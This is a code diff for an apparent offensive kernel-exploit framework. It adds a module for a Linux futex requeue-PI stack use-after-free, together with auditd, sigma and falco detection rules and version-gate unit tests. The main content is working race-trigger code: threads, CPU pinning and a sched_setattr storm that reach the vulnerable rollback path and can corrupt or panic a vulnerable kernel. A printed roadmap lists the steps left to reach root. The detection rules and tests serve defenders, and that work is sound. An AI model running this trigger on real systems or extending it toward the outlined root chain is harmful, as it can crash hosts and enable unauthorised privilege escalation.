* the code entirely. (In practice nothing modern is below this, but
|
||||
* the gate is here for correctness.) */
|
||||
if (!skeletonkey_host_kernel_at_least(ctx->host, 2, 6, 39)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] ghostlock: kernel %s predates PI-futex requeue "
|
||||
"(introduced 2.6.39) — not affected\n", v->release);
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (kernel_range_is_patched(&ghostlock_range, v)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[+] ghostlock: kernel %s is patched (>= 7.0.4 / "
|
||||
"6.12.86 / 6.6.140 / 6.1.175 on-branch, or 7.1+ "
|
||||
"mainline)\n", v->release);
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] ghostlock: VULNERABLE — kernel %s below the fix on "
|
||||
"its branch; rtmutex/futex requeue-PI remove_waiter() "
|
||||
"stack UAF reachable by any unprivileged user (no userns "
|
||||
"/ capability; assumes CONFIG_FUTEX_PI, near-universal)\n",
|
||||
v->release);
|
||||
fprintf(stderr, "[i] ghostlock: no unprivileged-userns or sysctl stopgap "
|
||||
"applies (PI futexes cannot be disabled at runtime) — the "
|
||||
"only fix is to patch the kernel\n");
|
||||
}
|
||||
return SKELETONKEY_VULNERABLE;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Reconstructed reachability trigger (deliberately under-driven).
|
||||
*
|
||||
* Faithful minimal shape of the public PoC's requeue-PI cycle:
|
||||
* waiter : LOCK_PI(chain); WAIT_REQUEUE_PI(wait -> target) [parks]
|
||||
* owner : LOCK_PI(target); LOCK_PI(chain) [blocks]
|
||||
* main : CMP_REQUEUE_PI(wait -> target) => -EDEADLK
|
||||
* The requeue would make the waiter block on `target` (held by owner),
|
||||
* owner is blocked on `chain` (held by waiter) → cycle → rt_mutex
|
||||
* deadlock detection returns -EDEADLK and runs remove_waiter() rollback.
|
||||
*
|
||||
* Phase A (no consumer) confirms that rollback path is REACHABLE — safe,
|
||||
* because without a concurrent PI priority walk the unwind is the normal
|
||||
* correct deadlock rejection and leaves nothing dangling. Phase B adds a
|
||||
* sibling-core sched_setattr(SCHED_BATCH) storm on the waiter's tid to
|
||||
* overlap the walk with the rollback (the actual race), hard-bounded,
|
||||
* then stops. We do NOT widen the copy_from_user window (no memfd /
|
||||
* PUNCH_HOLE), do NOT spray/reoccupy the freed stack frame, and do NOT
|
||||
* weaponise. The honest witness is coarse: the -EDEADLK reachability
|
||||
* proof, plus a fault signal in the isolated child if a Phase-B race
|
||||
* happened to fire. Absence of a fault does NOT prove the host is safe.
|
||||
* ------------------------------------------------------------------ */
|
||||
#define GHL_PROBE_ROUNDS 8 /* deterministic -EDEADLK confirmations (early-exit on first) */
|
||||
#define GHL_RACE_ITERS 24 /* hard-bounded race-window exercise (concurrent sched_setattr) */
|
||||
#define GHL_RACE_BUDGET_SECS 2 /* honest short cap (public PoC grinds for minutes) */
|
||||
#define GHL_PARK_TIMEOUT_MS 60 /* parked waiter/owner self-unblock so no attempt hangs */
|
||||
|
||||
struct ghl_sched_attr {
|
||||
uint32_t size;
|
||||
uint32_t sched_policy;
|
||||
uint64_t sched_flags;
|
||||
int32_t sched_nice;
|
||||
uint32_t sched_priority;
|
||||
uint64_t sched_runtime;
|
||||
uint64_t sched_deadline;
|
||||
uint64_t sched_period;
|
||||
};
|
||||
|
||||
struct ghl_attempt {
|
||||
volatile uint32_t chain; /* PI futex the waiter holds */
|
||||
volatile uint32_t target; /* PI futex the owner holds; requeue destination */
|
||||
volatile uint32_t wait; /* plain futex the waiter parks on */
|
||||
atomic_int waiter_ready; /* waiter holds chain + published tid */
|
||||
atomic_int owner_ready; /* owner holds target + about to block on chain */
|
||||
atomic_int waiter_tid; /* consumer targets this tid */
|
||||
atomic_int stop; /* tear-down flag for the consumer */
|
||||
};
|
||||
|
||||
static long ghl_futex(volatile uint32_t *uaddr, int op, uint32_t val,
|
||||
void *timeout_or_val2, volatile uint32_t *uaddr2,
|
||||
uint32_t val3)
|
||||
{
|
||||
return syscall(SYS_futex, uaddr, op, val, timeout_or_val2, uaddr2, val3);
|
||||
}
|
||||
|
||||
static int ghl_gettid(void)
|
||||
{
|
||||
return (int)syscall(SYS_gettid);
|
||||
}
|
||||
|
||||
static void ghl_pin_cpu(int cpu)
|
||||
{
|
||||
cpu_set_t set;
|
||||
CPU_ZERO(&set);
|
||||
CPU_SET(cpu, &set);
|
||||
(void)sched_setaffinity(0, sizeof set, &set); /* best-effort */
|
||||
}
|
||||
|
||||
static void ghl_abs_realtime_ms(struct timespec *ts, long ms)
|
||||
{
|
||||
clock_gettime(CLOCK_REALTIME, ts);
|
||||
ts->tv_sec += ms / 1000;
|
||||
ts->tv_nsec += (ms % 1000) * 1000000L;
|
||||
if (ts->tv_nsec >= 1000000000L) { ts->tv_sec++; ts->tv_nsec -= 1000000000L; }
|
||||
}
|
||||
|
||||
static void *ghl_waiter_fn(void *arg)
|
||||
{
|
||||
struct ghl_attempt *a = (struct ghl_attempt *)arg;
|
||||
ghl_pin_cpu(0);
|
||||
/* Acquire the chain PI-futex (uncontended → success, sets it to our tid). */
|
||||
(void)ghl_futex(&a->chain, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
|
||||
atomic_store_explicit(&a->waiter_tid, ghl_gettid(), memory_order_release);
|
||||
atomic_store_explicit(&a->waiter_ready, 1, memory_order_release);
|
||||
/* Park, pre-queued to be requeued onto `target`. Short absolute timeout
|
||||
* so we self-unblock even if the requeue is refused (-EDEADLK). */
|
||||
struct timespec ts;
|
||||
ghl_abs_realtime_ms(&ts, GHL_PARK_TIMEOUT_MS);
|
||||
(void)ghl_futex(&a->wait, FUTEX_WAIT_REQUEUE_PI | FUTEX_CLOCK_REALTIME, 0,
|
||||
&ts, &a->target, 0);
|
||||
(void)ghl_futex(&a->chain, FUTEX_UNLOCK_PI, 0, NULL, NULL, 0);
|
||||
return NULL;
|
||||
}
|
||||
|
||||
static void *ghl_owner_fn(void *arg)
|
||||
{
|
||||
struct ghl_attempt *a = (struct ghl_attempt *)arg;
|
||||
ghl_pin_cpu(0);
|
||||
while (!atomic_load_explicit(&a->waiter_ready, memory_order_acquire))
|
||||
sched_yield();
|
||||
(void)ghl_futex(&a->target, FUTEX_LOCK_PI, 0, NULL, NULL, 0); /* hold target */
|
||||
atomic_store_explicit(&a->owner_ready, 1, memory_order_release);
|
||||
struct timespec ts;
|
||||
ghl_abs_realtime_ms(&ts, GHL_PARK_TIMEOUT_MS);
|
||||
(void)ghl_futex(&a->chain, FUTEX_LOCK_PI, 0, &ts, NULL, 0); /* block on chain */
|
||||
(void)ghl_futex(&a->target, FUTEX_UNLOCK_PI, 0, NULL, NULL, 0);
|
||||
return NULL;
|
||||
}
|
||||
|
||||
static void *ghl_consumer_fn(void *arg)
|
||||
{
|
||||
struct ghl_attempt *a = (struct ghl_attempt *)arg;
|
||||
ghl_pin_cpu(1); /* sibling CPU */
|
||||
while (!atomic_load_explicit(&a->waiter_tid, memory_order_acquire))
|
||||
sched_yield();
|
||||
int tid = atomic_load_explicit(&a->waiter_tid, memory_order_acquire);
|
||||
struct ghl_sched_attr sa;
|
||||
memset(&sa, 0, sizeof sa);
|
||||
sa.size = sizeof sa;
|
||||
sa.sched_policy = SCHED_BATCH;
|
||||
sa.sched_nice = 19;
|
||||
/* Hammer a PI-chain priority walk on the waiter concurrently with the
|
||||
* rollback. SYS_sched_setattr may be absent on ancient toolchains. */
|
||||
while (!atomic_load_explicit(&a->stop, memory_order_acquire)) {
|
||||
#ifdef SYS_sched_setattr
|
||||
(void)syscall(SYS_sched_setattr, tid, &sa, 0u);
|
||||
#else
|
||||
sched_yield();
|
||||
#endif
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
/* One attempt: build the requeue-PI cycle and fire CMP_REQUEUE_PI. With
|
||||
* with_race, run the concurrent sched_setattr storm. Returns 1 iff the
|
||||
* kernel returned -EDEADLK (the rollback path was reached). */
|
||||
static int ghl_one_attempt(int with_race)
|
||||
{
|
||||
struct ghl_attempt a;
|
||||
memset(&a, 0, sizeof a);
|
||||
|
||||
pthread_t tw, to, tc;
|
||||
int have_tc = 0;
|
||||
|
||||
if (pthread_create(&tw, NULL, ghl_waiter_fn, &a) != 0)
|
||||
return 0;
|
||||
while (!atomic_load_explicit(&a.waiter_ready, memory_order_acquire))
|
||||
sched_yield();
|
||||
|
||||
if (pthread_create(&to, NULL, ghl_owner_fn, &a) != 0) {
|
||||
atomic_store_explicit(&a.stop, 1, memory_order_release);
|
||||
pthread_join(tw, NULL);
|
||||
return 0;
|
||||
}
|
||||
while (!atomic_load_explicit(&a.owner_ready, memory_order_acquire))
|
||||
sched_yield();
|
||||
|
||||
if (with_race && pthread_create(&tc, NULL, ghl_consumer_fn, &a) == 0)
|
||||
have_tc = 1;
|
||||
|
||||
/* Settle: let the waiter park in WAIT_REQUEUE_PI and the owner in
|
||||
* LOCK_PI(chain) before we close the cycle. */
|
||||
usleep(3000);
|
||||
|
||||
errno = 0;
|
||||
long r = ghl_futex(&a.wait, FUTEX_CMP_REQUEUE_PI, 1,
|
||||
(void *)(uintptr_t)1, &a.target, 0);
|
||||
int got_edeadlk = (r == -1 && errno == EDEADLK);
|
||||
|
||||
atomic_store_explicit(&a.stop, 1, memory_order_release);
|
||||
if (have_tc) pthread_join(tc, NULL);
|
||||
pthread_join(to, NULL); /* parked threads self-unblock via their timeouts */
|
||||
pthread_join(tw, NULL);
|
||||
return got_edeadlk;
|
||||
}
|
||||
|
||||
static skeletonkey_result_t ghostlock_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
skeletonkey_result_t pre = ghostlock_detect(ctx);
|
||||
if (pre != SKELETONKEY_VULNERABLE) {
|
||||
fprintf(stderr, "[-] ghostlock: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
|
||||
if (is_root) {
|
||||
fprintf(stderr, "[i] ghostlock: already running as root\n");
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] ghostlock: reconstructed reachability probe — builds "
|
||||
"the requeue-PI cycle and confirms the -EDEADLK "
|
||||
"remove_waiter() rollback path is reachable, then exercises "
|
||||
"the race window %d bounded times (%ds cap) with a "
|
||||
"sibling-CPU sched_setattr storm, and stops. The "
|
||||
"KernelSnitch leak → forged-waiter → fops/ashmem/pipe R/W "
|
||||
"→ cred-patch root-pop is NOT bundled.\n",
|
||||
GHL_RACE_ITERS, GHL_RACE_BUDGET_SECS);
|
||||
|
||||
/* Fork-isolated: a *won* Phase-B race corrupts the kernel stack. On a
|
||||
* KASAN kernel that oopses (contained to the child); on a plain
|
||||
* vulnerable kernel it may panic — which is exactly why the attempt
|
||||
* count is hard-bounded and the window is never widened. */
|
||||
pid_t child = fork();
|
||||
if (child < 0) { perror("[-] fork"); return SKELETONKEY_TEST_ERROR; }
|
||||
|
||||
if (child == 0) {
|
||||
/* Phase A — deterministic, safe reachability confirmation. */
|
||||
int edeadlk = 0;
|
||||
for (int i = 0; i < GHL_PROBE_ROUNDS && !edeadlk; i++)
|
||||
edeadlk = ghl_one_attempt(0 /* no race */);
|
||||
|
||||
/* Phase B — hard-bounded window exercise (concurrent priority walk). */
|
||||
int fired = 0;
|
||||
time_t deadline = time(NULL) + GHL_RACE_BUDGET_SECS;
|
||||
for (int i = 0; i < GHL_RACE_ITERS && time(NULL) < deadline; i++) {
|
||||
(void)ghl_one_attempt(1 /* with race */);
|
||||
fired = i + 1;
|
||||
}
|
||||
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] ghostlock: requeue-PI rollback reachable: %s; "
|
||||
"%d bounded race-window iterations fired\n",
|
||||
edeadlk ? "YES (-EDEADLK observed)" : "not observed", fired);
|
||||
_exit(edeadlk ? 100 : 101);
|
||||
}
|
||||
|
||||
int status;
|
||||
waitpid(child, &status, 0);
|
||||
if (WIFSIGNALED(status)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[!] ghostlock: child died by signal %d — the "
|
||||
"requeue-PI stack UAF may have fired (KASAN oops / "
|
||||
"corruption fault). This is the bug, but no root was "
|
||||
"obtained.\n",
|
||||
WTERMSIG(status));
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
if (WIFEXITED(status) &&
|
||||
(WEXITSTATUS(status) == 100 || WEXITSTATUS(status) == 101)) {
|
||||
if (!ctx->json) {
|
||||
if (WEXITSTATUS(status) == 100)
|
||||
fprintf(stderr, "[!] ghostlock: the vulnerable requeue-PI "
|
||||
"deadlock-rollback path IS reachable here "
|
||||
"(-EDEADLK) and the race window was exercised — "
|
||||
"reconstructed primitive, honest EXPLOIT_FAIL.\n");
|
||||
else
|
||||
fprintf(stderr, "[!] ghostlock: race window exercised but the "
|
||||
"-EDEADLK rollback path was not observed (timing, "
|
||||
"or a hardened/patched-at-runtime kernel) — honest "
|
||||
"EXPLOIT_FAIL.\n");
|
||||
fprintf(stderr, "[i] ghostlock: to complete: port the public "
|
||||
"KernelSnitch page leak + forged on-stack "
|
||||
"rt_mutex_waiter + fops/configfs/ashmem/pipe R/W + "
|
||||
"cred patch for CVE-2026-43499 (Android/Pixel-specific, "
|
||||
"per-build offsets — not bundled).\n");
|
||||
}
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[-] ghostlock: probe setup failed (child rc=%d)\n",
|
||||
WIFEXITED(status) ? WEXITSTATUS(status) : -1);
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
#else /* !__linux__ */
|
||||
|
||||
static skeletonkey_result_t ghostlock_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] ghostlock: Linux-only module (rtmutex/futex "
|
||||
"requeue-PI stack UAF) — not applicable here\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
static skeletonkey_result_t ghostlock_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr, "[-] ghostlock: Linux-only module — cannot run here\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
#endif /* __linux__ */
|
||||
|
||||
/* ----- Embedded detection rules -----
|
||||
*
|
||||
* Honesty note (see MODULE.md): unlike most kernel races, GhostLock has a
|
||||
* genuinely distinctive behavioural tell — a futex requeue-PI operation
|
||||
* (FUTEX_WAIT_REQUEUE_PI / FUTEX_CMP_REQUEUE_PI) returning -EDEADLK, which
|
||||
* glibc's requeue-PI usage inside pthread_cond_wait never provokes. The
|
||||
* catch: auditd/sigma see the `futex` syscall but not its op-vs-return
|
||||
* cheaply, and a bare `-S futex` watch would flood any host (futex is one
|
||||
* of the busiest syscalls). So the deployable auditd/sigma rules anchor on
|
||||
* the far rarer sched_setattr (the sibling-thread priority-walk driver) and
|
||||
* the post-exploitation euid-0 transition; the high-fidelity
|
||||
* requeue-PI-returns-EDEADLK signal is expressed in the falco/eBPF rule,
|
||||
* which can see the op and the return value. Tune per environment.
|
||||
*/
|
||||
static const char ghostlock_auditd[] =
|
||||
"# GhostLock — rtmutex/futex requeue-PI remove_waiter() stack UAF (CVE-2026-43499) — auditd rules\n"
|
||||
"# NOTE: a bare `-S futex` watch would flood auditd (futex is ubiquitous) and\n"
|
||||
"# auditd cannot cheaply test a syscall's return against its op, so we anchor on\n"
|
||||
"# the far rarer sched_setattr — the GhostLock trigger fires it on a SIBLING\n"
|
||||
"# thread in a tight loop (policy SCHED_BATCH) to drive the PI-chain priority\n"
|
||||
"# walk that wins the race — plus sched_setaffinity CPU pinning of the racers.\n"
|
||||
"# The high-fidelity 'requeue-PI returns EDEADLK' tell needs an eBPF/falco layer\n"
|
||||
"# that can see the op+retval (see the shipped falco rule). Correlate these in\n"
|
||||
"# your SIEM per-pid within a short window; individually they are benign.\n"
|
||||
"-a always,exit -F arch=b64 -S sched_setattr -k skeletonkey-ghostlock-schedattr\n"
|
||||
"-a always,exit -F arch=b64 -S sched_setaffinity -k skeletonkey-ghostlock-affinity\n"
|
||||
"# Post-exploitation fallback: unprivileged process -> euid 0 with no setuid execve.\n"
|
||||
"-a always,exit -F arch=b64 -S setresuid -F a0=0 -F a1=0 -F a2=0 -F auid>=1000 -F auid!=4294967295 -k skeletonkey-ghostlock-priv\n"
|
||||
"-a always,exit -F arch=b64 -S setuid -F a0=0 -F auid>=1000 -F auid!=4294967295 -k skeletonkey-ghostlock-priv\n";
|
||||
|
||||
static const char ghostlock_sigma[] =
|
||||
"title: Possible CVE-2026-43499 GhostLock rtmutex/futex requeue-PI stack UAF\n"
|
||||
"id: 2f8a6b4c-skeletonkey-ghostlock\n"
|
||||
"status: experimental\n"
|
||||
"description: |\n"
|
||||
" GhostLock (CVE-2026-43499) is a stack UAF in the rtmutex/futex requeue-PI\n"
|
||||
" rollback path, reachable by any unprivileged user via futex(2) +\n"
|
||||
" sched_setattr(2). The strongest behavioural tell is a futex requeue-PI op\n"
|
||||
" (FUTEX_WAIT_REQUEUE_PI=11 / FUTEX_CMP_REQUEUE_PI=12) returning -EDEADLK\n"
|
||||
" (glibc never provokes this) interleaved with sched_setattr(SCHED_BATCH)\n"
|
||||
" targeting a SIBLING thread and sched_setaffinity CPU pinning — but auditd\n"
|
||||
" cannot see the futex op/return cheaply, so this rule keys on the rarer\n"
|
||||
" sched_setattr driver and the post-exploitation euid-0 transition. Use the\n"
|
||||
" falco/eBPF rule for the high-fidelity requeue-PI-EDEADLK signal. Expect\n"
|
||||
" false positives from legitimate real-time / scheduler-tuning daemons.\n"
|
||||
"logsource: {product: linux, service: auditd}\n"
|
||||
"detection:\n"
|
||||
" schedattr: {type: 'SYSCALL', syscall: 'sched_setattr'}\n"
|
||||
" uid0: {type: 'SYSCALL', syscall: 'setresuid', a0: 0, a1: 0, a2: 0}\n"
|
||||
" unpriv: {auid|expression: '>= 1000'}\n"
|
||||
" condition: schedattr or (uid0 and unpriv)\n"
|
||||
"level: medium\n"
|
||||
"tags: [attack.privilege_escalation, attack.t1068, cve.2026.43499]\n";
|
||||
|
||||
static const char ghostlock_falco[] =
|
||||
"- rule: Futex requeue-PI EDEADLK with sibling sched_setattr (possible CVE-2026-43499)\n"
|
||||
" desc: |\n"
|
||||
" GhostLock (CVE-2026-43499) rtmutex/futex requeue-PI stack UAF. High-fidelity\n"
|
||||
" tell (needs a futex-aware eBPF probe that exposes the op + return value): a\n"
|
||||
" FUTEX_WAIT_REQUEUE_PI / FUTEX_CMP_REQUEUE_PI that returns EDEADLK — glibc's\n"
|
||||
" requeue-PI usage inside pthread_cond_wait never provokes it — combined with\n"
|
||||
" the same tgid calling sched_setattr(SCHED_BATCH) on a sibling thread. Where\n"
|
||||
" the probe cannot decode the futex op, fall back to the post-exploitation\n"
|
||||
" effect below: a non-root process becoming root outside a setuid binary.\n"
|
||||
" condition: >\n"
|
||||
" (evt.type = futex and evt.rawres = -35) or\n"
|
||||
" (evt.type in (setuid, setresuid) and evt.arg.uid = 0 and\n"
|
||||
" not proc.is_setuid = true and user.uid != 0)\n"
|
||||
" output: >\n"
|
||||
" Possible CVE-2026-43499 GhostLock requeue-PI stack UAF\n"
|
||||
" (user=%user.name proc=%proc.name pid=%proc.pid ppid=%proc.ppid evt=%evt.type res=%evt.res)\n"
|
||||
" priority: WARNING\n"
|
||||
" tags: [process, mitre_privilege_escalation, T1068, cve.2026.43499]\n";
|
||||
|
||||
const struct skeletonkey_module ghostlock_module = {
|
||||
.name = "ghostlock",
|
||||
.cve = "CVE-2026-43499",
|
||||
.summary = "rtmutex/futex requeue-PI remove_waiter() stack UAF (\"GhostLock\") — clears pi_blocked_on on the wrong task during -EDEADLK rollback; ~15-year range, unprivileged, no userns",
|
||||
.family = "rtmutex",
|
||||
.kernel_range = "2.6.39 <= K < fix (introduced with PI-futex requeue); fixed 3bfdc63936dd (7.1-rc1), stable backports 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175; 5.15/5.10/5.4/4.19 affected with no upstream stable fix; < 2.6.39 not affected",
|
||||
.detect = ghostlock_detect,
|
||||
.exploit = ghostlock_exploit,
|
||||
.mitigate = NULL, /* mitigation: upgrade kernel — PI futexes cannot be disabled at runtime, no userns/sysctl stopgap */
|
||||
.cleanup = NULL, /* trigger creates only throwaway futex words + threads in a fork-isolated child; no host artifacts */
|
||||
.detect_auditd = ghostlock_auditd,
|
||||
.detect_sigma = ghostlock_sigma,
|
||||
.detect_yara = NULL, /* pure in-kernel race — no file artifact to match */
|
||||
.detect_falco = ghostlock_falco,
|
||||
.opsec_notes = "detect() is a pure kernel-version gate (vulnerable iff >= 2.6.39 AND below the on-branch fix: stable backports 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175, 7.1+ inherits mainline; 5.15/5.10/5.4/4.19 affected with no upstream fix) — no userns/CONFIG probe (CVSS PR:L, any local user; CONFIG_FUTEX_PI assumed, near-universal). exploit() forks an isolated child that (A) builds the requeue-PI cycle and confirms the -EDEADLK remove_waiter() rollback path is reachable — deterministic and safe, since without a concurrent priority walk the unwind creates no dangling pointer — then (B) exercises the actual race a hard-bounded 24 iterations / 2s with a sibling-CPU sched_setattr(SCHED_BATCH) storm on the waiter's tid, and stops. It is deliberately UNDER-DRIVEN: it does not widen the copy_from_user window (no memfd/PUNCH_HOLE), does not spray/reoccupy the freed kernel-stack frame, and does not bundle the KernelSnitch leak → forged on-stack rt_mutex_waiter → fops/configfs/ashmem/pipe R/W → cred-patch root-pop (Android/Pixel-specific, per-build offsets); the trigger is reconstructed from the public VEGA/Nebula PoC, not VM-verified, and returns EXPLOIT_FAIL. Telemetry footprint — unlike most kernel races GhostLock has a real behavioural signature: a burst of futex requeue-PI ops returning EDEADLK (glibc never does this) plus tight-loop sched_setattr(SCHED_BATCH) on a sibling thread and sched_setaffinity CPU pinning; and, only if a Phase-B race fires on a vulnerable host, a possible KASAN oops or kernel-stack panic. No persistent files. Lowest --auto safety rank in the corpus: a won race corrupts the kernel stack and drives a near-arbitrary pointer write.",
|
||||
.arch_support = "any",
|
||||
};
|
||||
|
||||
void skeletonkey_register_ghostlock(void)
|
||||
{
|
||||
skeletonkey_register(&ghostlock_module);
|
||||
}
|
||||
@@ -0,0 +1,12 @@
|
||||
/*
|
||||
* ghostlock_cve_2026_43499 — SKELETONKEY module registry hook
|
||||
*/
|
||||
|
||||
#ifndef GHOSTLOCK_SKELETONKEY_MODULES_H
|
||||
#define GHOSTLOCK_SKELETONKEY_MODULES_H
|
||||
|
||||
#include "../../core/module.h"
|
||||
|
||||
extern const struct skeletonkey_module ghostlock_module;
|
||||
|
||||
#endif
|
||||
+3
-1
@@ -35,7 +35,7 @@
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#define SKELETONKEY_VERSION "0.9.11"
|
||||
#define SKELETONKEY_VERSION "0.9.13"
|
||||
|
||||
static const char BANNER[] =
|
||||
"\n"
|
||||
@@ -1021,6 +1021,8 @@ static int module_safety_rank(const char *n)
|
||||
if (!strcmp(n, "nft_catchall")) return 35; /* reconstructed nf_tables abort UAF; may KASAN-oops, primitive-only/not VM-verified */
|
||||
if (!strcmp(n, "af_unix_gc")) return 25; /* kernel race, low win% */
|
||||
if (!strcmp(n, "stackrot")) return 15; /* very low win% */
|
||||
if (!strcmp(n, "bad_epoll")) return 12; /* reconstructed epoll teardown race UAF; a won race frees a live struct file and rarely trips KASAN (silent-corruption risk), primitive-only/not VM-verified */
|
||||
if (!strcmp(n, "ghostlock")) return 11; /* reconstructed rtmutex/futex requeue-PI stack UAF; a won race corrupts the kernel stack + writes a near-arbitrary pointer (immediate-panic risk), primitive-only/not VM-verified — least predictable in the corpus */
|
||||
if (!strcmp(n, "entrybleed")) return 0; /* leak only, not LPE */
|
||||
return 50; /* kernel primitives — middle of pack */
|
||||
}
|
||||
|
||||
@@ -72,6 +72,8 @@ extern const struct skeletonkey_module ptrace_pidfd_module;
|
||||
extern const struct skeletonkey_module sudo_host_module;
|
||||
extern const struct skeletonkey_module cifswitch_module;
|
||||
extern const struct skeletonkey_module nft_catchall_module;
|
||||
extern const struct skeletonkey_module bad_epoll_module;
|
||||
extern const struct skeletonkey_module ghostlock_module;
|
||||
|
||||
static int g_pass = 0;
|
||||
static int g_fail = 0;
|
||||
@@ -891,6 +893,123 @@ static void run_all(void)
|
||||
&nft_catchall_module, &h_nca_nouserns,
|
||||
SKELETONKEY_PRECOND_FAIL);
|
||||
|
||||
/* ── bad_epoll (CVE-2026-46242) ──────────────────────────────
|
||||
* Pure version gate: vulnerable iff >= 6.4 (bug introduced
|
||||
* 58c9b016e128) AND below the fix on-branch (stable backport
|
||||
* 7.0.13; 7.1+ inherits via mainline). NO userns/CONFIG
|
||||
* precondition — epoll is reachable by every unprivileged user, so
|
||||
* there is deliberately no PRECOND_FAIL path to test. userns state
|
||||
* of the base host is irrelevant here. */
|
||||
|
||||
/* 6.1.100 predates the vulnerable epoll path (introduced 6.4) → OK */
|
||||
struct skeletonkey_host h_bep_61 =
|
||||
mk_host(h_kernel_6_12, 6, 1, 100, "6.1.100-test");
|
||||
run_one("bad_epoll: 6.1.100 predates the bug (introduced 6.4) → OK",
|
||||
&bad_epoll_module, &h_bep_61,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 6.12.70 in range [6.4, 7.0.13) → VULNERABLE (no userns needed) */
|
||||
struct skeletonkey_host h_bep_61270 =
|
||||
mk_host(h_kernel_6_12, 6, 12, 70, "6.12.70-test");
|
||||
run_one("bad_epoll: 6.12.70 in range → VULNERABLE (no userns gate)",
|
||||
&bad_epoll_module, &h_bep_61270,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 7.0.5 on the 7.0 branch, below the 7.0.13 backport → VULNERABLE */
|
||||
struct skeletonkey_host h_bep_705 =
|
||||
mk_host(h_kernel_6_12, 7, 0, 5, "7.0.5-test");
|
||||
run_one("bad_epoll: 7.0.5 below the 7.0.13 backport → VULNERABLE",
|
||||
&bad_epoll_module, &h_bep_705,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 7.0.13 exact backport → OK via patch table */
|
||||
struct skeletonkey_host h_bep_70130 =
|
||||
mk_host(h_kernel_6_12, 7, 0, 13, "7.0.13-test");
|
||||
run_one("bad_epoll: 7.0.13 (exact backport) → OK via patch table",
|
||||
&bad_epoll_module, &h_bep_70130,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 7.1.0 newer than every entry → mainline-inherited fix → OK */
|
||||
struct skeletonkey_host h_bep_710 =
|
||||
mk_host(h_kernel_6_12, 7, 1, 0, "7.1.0-test");
|
||||
run_one("bad_epoll: 7.1.0 above the backport → OK (mainline inherit)",
|
||||
&bad_epoll_module, &h_bep_710,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* ── ghostlock (CVE-2026-43499) ──────────────────────────────
|
||||
* Pure version gate over a FIVE-branch backport table (fixed
|
||||
* 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175 on-branch, 7.1+
|
||||
* inherits mainline; introduced 2.6.39). Unlike bad_epoll's single
|
||||
* entry, this exercises kernel_range_is_patched()'s "strictly newer
|
||||
* than ALL entries" mainline-inherit clause: 6.13.x is newer than
|
||||
* some entries but not all, so it must stay VULNERABLE. The 5.x/4.19
|
||||
* LTS branches are affected with NO upstream fix. No userns/CONFIG
|
||||
* precondition (CVSS PR:L, any local user). */
|
||||
|
||||
/* 2.6.30 predates PI-futex requeue (introduced 2.6.39) → OK */
|
||||
struct skeletonkey_host h_ghl_2630 =
|
||||
mk_host(h_kernel_6_12, 2, 6, 30, "2.6.30-test");
|
||||
run_one("ghostlock: 2.6.30 predates PI-futex requeue → OK",
|
||||
&ghostlock_module, &h_ghl_2630,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 5.10.200 — affected LTS with NO upstream stable fix → VULNERABLE */
|
||||
struct skeletonkey_host h_ghl_510 =
|
||||
mk_host(h_kernel_6_12, 5, 10, 200, "5.10.200-test");
|
||||
run_one("ghostlock: 5.10.200 (no upstream fix on 5.10) → VULNERABLE",
|
||||
&ghostlock_module, &h_ghl_510,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 6.1.174 one below the 6.1.175 backport → VULNERABLE */
|
||||
struct skeletonkey_host h_ghl_61174 =
|
||||
mk_host(h_kernel_6_12, 6, 1, 174, "6.1.174-test");
|
||||
run_one("ghostlock: 6.1.174 below the 6.1.175 backport → VULNERABLE",
|
||||
&ghostlock_module, &h_ghl_61174,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 6.1.175 exact backport → OK via patch table */
|
||||
struct skeletonkey_host h_ghl_61175 =
|
||||
mk_host(h_kernel_6_12, 6, 1, 175, "6.1.175-test");
|
||||
run_one("ghostlock: 6.1.175 (exact backport) → OK via patch table",
|
||||
&ghostlock_module, &h_ghl_61175,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 6.12.85 one below the 6.12.86 backport → VULNERABLE */
|
||||
struct skeletonkey_host h_ghl_61285 =
|
||||
mk_host(h_kernel_6_12, 6, 12, 85, "6.12.85-test");
|
||||
run_one("ghostlock: 6.12.85 below the 6.12.86 backport → VULNERABLE",
|
||||
&ghostlock_module, &h_ghl_61285,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
